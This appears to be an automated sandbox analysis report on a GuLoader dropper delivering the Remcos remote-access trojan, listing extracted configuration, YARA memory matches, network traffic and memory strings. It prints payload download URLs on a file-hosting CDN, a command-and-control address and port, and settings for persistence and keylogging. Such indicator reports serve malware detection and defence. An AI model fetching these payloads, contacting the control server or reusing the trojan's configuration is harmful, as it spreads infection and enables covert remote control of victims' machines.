Source: 00000019.00000002.398154379475.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"} |
Source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "i;j49.123:2404:194.130.249.123:4687:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-WPACZI", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"} |
Source: Yara match |
File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com Cache-Control: no-cache |
Source: unknown |
Network traffic detected: HTTP traffic on port 49817 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49818 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49827 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49829 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49818 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49829 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49817 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49827 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.130.249.123 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: ieinstal.exe, 00000011.00000003.397078792955.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: ieinstal.exe, 00000011.00000003.397078792955.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png$ |
Source: powershell.exe, 00000004.00000002.397124852706.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.398643865938.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398107972991.00000000052A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398548806437.0000000004B81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$ |
Source: powershell.exe, 00000004.00000002.397124852706.0000000004A81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB6m |
Source: powershell.exe, 00000015.00000002.398643865938.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398107972991.00000000052A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398548806437.0000000004B81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBAm |
Source: ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/ |
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/1s |
Source: ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin |
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin& |
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binb |
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bing |
Source: ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binn32 |
Source: ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binnmd |
Source: ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bino |
Source: ieinstal.exe, 00000011.00000002.401434029761.000000001EA64000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bins |
Source: ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bint |
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011752798.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404217250.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg |
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpgS |
Source: ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/c |
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/k-? |
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com/p |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester$ |
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |